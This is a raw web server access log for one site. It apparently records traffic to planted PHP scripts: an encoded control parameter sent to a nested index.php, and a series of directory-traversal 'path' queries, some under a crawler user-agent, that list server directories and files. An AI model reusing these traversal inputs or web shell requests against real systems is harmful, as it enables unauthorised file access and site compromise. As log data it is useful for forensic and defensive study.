62.164.177.242 - - [21/Aug/2025:12:31:22 -0400] "GET /3534f/3534f/3534f/index.php?ARRAY=7o2230223n313735353739373438322p2231223n22687474703n5p2s5p2s63312r7975656r616r77696r2r71706s6r5p2s3s6p633q7068705s636s64655s6n6326743q313735353739333838322q3033666361313365616330393562356532666637353336366535613230383266222p2232223n223530643831643336383337313461366232356234373630626334383764663866222p2233223n223934356438666134663530376639383361656238376163666666646565326364222p2262696r675s70617373223n2232322q33372q35332q36392q37392q38322q3237227q HTTP/2.0" 200 0 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 10_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/10.0.4 Mobile/15E148 Safari/604.1" "62.164.177.242" 665 0.008 "0" "0.007" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:31:53 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2Fruntime%2Fcomposer HTTP/2.0" 200 1479 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 350 0.013 "8062" "0.013" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:31:55 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2Fruntime%2Fcompiled_classes HTTP/2.0" 200 1485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 355 0.003 "7229" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:31:58 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2Fruntime%2FHTML HTTP/2.0" 200 1483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 113 0.004 "7142" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:32:01 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Ff7c78%2F..%2Fcomfunctions.php HTTP/2.0" 200 3070 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 363 0.003 "9124" "0.003" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:32:08 -0400] "GET /files/2023-01-24/2023-01-24/2023-01-24/2023-01-24/index.php?of=1 HTTP/2.0" 200 2111 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:74.0) Gecko/20100101 Firefox/74.0" "62.164.177.242" 285 0.002 "5576" "0.002" "test.newsite.space"
62.164.177.242 - - [21/Aug/2025:12:32:48 -0400] "GET /3534f/3534f/3534f/index.php?of=1 HTTP/2.0" 200 2084 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0" "62.164.177.242" 268 0.006 "5286" "0.006" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:33:18 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F..%2F.%2Ff7c78%2Ff7c78%2Fcache.php HTTP/2.0" 200 4788 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 360 0.010 "8241" "0.009" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:33:21 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2Ff7c78%2Ff7c78%2F.%2F..%2Ff7c78%2Ff7c78%2Fcache.php HTTP/2.0" 200 4790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 361 0.004 "8240" "0.004" "test.newsite.space"
216.73.216.46 - - [21/Aug/2025:12:33:24 -0400] "GET /f7c78/?path=%2Fsrv%2Fusers%2Fcraft4%2Fapps%2Fcraft4-newsite-space%2Fpublic%2F..%2F.%2Fstorage%2Fruntime%2Fcompiled_templates HTTP/2.0" 200 2505 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "216.73.216.46" 356 0.007 "140995" "0.008" "test.newsite.space"
